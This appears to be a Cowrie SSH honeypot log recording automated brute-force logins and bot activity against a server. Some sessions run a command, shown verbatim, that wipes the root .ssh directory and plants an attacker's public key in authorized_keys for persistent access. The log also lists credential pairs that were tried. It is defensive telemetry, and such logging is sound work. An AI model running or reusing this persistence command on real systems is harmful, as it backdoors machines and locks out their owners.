{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:56:34.579661Z","src_ip":"212.227.235.229","session":"5b9df75a997a"}
{"eventid":"cowrie.login.failed","username":"hunter","password":"hunter@123","message":"login attempt [hunter/hunter@123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:56:35.101722Z","src_ip":"212.227.235.229","session":"5b9df75a997a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:56:36.223674Z","src_ip":"212.227.235.229","session":"5b9df75a997a"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":57210,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8dac50d0f2c","protocol":"ssh","message":"New connection: 185.255.91.51:57210 (1.2.3.4:22) [session: e8dac50d0f2c]","sensor":"my-vps","timestamp":"2025-09-08T14:57:05.551620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:57:05.554858Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:57:05.643469Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.login.success","username":"root","password":"000000000","message":"login attempt [root/000000000] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.001990Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:57:06.236061Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.236742Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.237596Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.327914Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:57:06.524865Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.525636Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.619385Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.620196Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":50264,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb0a4d92ce86","protocol":"ssh","message":"New connection: 185.255.91.51:50264 (1.2.3.4:22) [session: cb0a4d92ce86]","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.715966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.720312Z","src_ip":"185.255.91.51","session":"cb0a4d92ce86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.811018Z","src_ip":"185.255.91.51","session":"cb0a4d92ce86"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":37394,"dst_ip":"1.2.3.4","dst_port":22,"session":"c967040a708e","protocol":"ssh","message":"New connection: 158.51.124.56:37394 (1.2.3.4:22) [session: c967040a708e]","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.900866Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:57:06.901615Z","src_ip":"158.51.124.56","session":"c967040a708e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:57:07.039755Z","src_ip":"158.51.124.56","session":"c967040a708e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:57:07.183750Z","src_ip":"185.255.91.51","session":"cb0a4d92ce86"}
{"eventid":"cowrie.login.failed","username":"build","password":"password","message":"login attempt [build/password] failed","sensor":"my-vps","timestamp":"2025-09-08T14:57:07.635245Z","src_ip":"158.51.124.56","session":"c967040a708e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:08.296797Z","src_ip":"185.255.91.51","session":"cb0a4d92ce86"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":50278,"dst_ip":"1.2.3.4","dst_port":22,"session":"c65746414db1","protocol":"ssh","message":"New connection: 185.255.91.51:50278 (1.2.3.4:22) [session: c65746414db1]","sensor":"my-vps","timestamp":"2025-09-08T14:57:08.391040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:57:08.391886Z","src_ip":"185.255.91.51","session":"c65746414db1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:57:08.489443Z","src_ip":"185.255.91.51","session":"c65746414db1"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:08.775371Z","src_ip":"158.51.124.56","session":"c967040a708e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:57:08.909262Z","src_ip":"185.255.91.51","session":"c65746414db1"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:08.996708Z","src_ip":"185.255.91.51","session":"e8dac50d0f2c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:09.003541Z","src_ip":"185.255.91.51","session":"c65746414db1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56544,"dst_ip":"1.2.3.4","dst_port":22,"session":"e69ee1f270dd","protocol":"ssh","message":"New connection: 212.227.235.229:56544 (1.2.3.4:22) [session: e69ee1f270dd]","sensor":"my-vps","timestamp":"2025-09-08T14:57:37.984823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:57:37.985748Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:57:38.106745Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.login.success","username":"root","password":"a","message":"login attempt [root/a] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:57:38.592836Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:57:38.882375Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:57:38.883138Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:57:38.884139Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:39.007091Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:57:39.308196Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:57:39.309162Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:57:39.432924Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:39.433983Z","src_ip":"212.227.235.229","session":"e69ee1f270dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56550,"dst_ip":"1.2.3.4","dst_port":22,"session":"482f412268c2","protocol":"ssh","message":"New connection: 212.227.235.229:56550 (1.2.3.4:22) [session: 482f412268c2]","sensor":"my-vps","timestamp":"2025-09-08T14:57:39.555893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:57:39.556601Z","src_ip":"212.227.235.229","session":"482f412268c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:57:39.679241Z","src_ip":"212.227.235.229","session":"482f412268c2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:57:40.212906Z","src_ip":"212.227.235.229","session":"482f412268c2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:57:41.338402Z","src_ip":"212.227.235.229","session":"482f412268c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56562,"dst_ip":"1.2.3.4","dst_port":22,"session":"be3fb035ce1c","protocol":"ssh","message":"New connection: 212.227.235.229:56562 (1.2.3.4:22) [session: be3fb035ce1c]","sensor":"my-vps","timestamp":"2025-09-08T14:57:41.457440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:57:41.458068Z","src_ip":"212.227.235.229","session":"be3fb035ce1c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp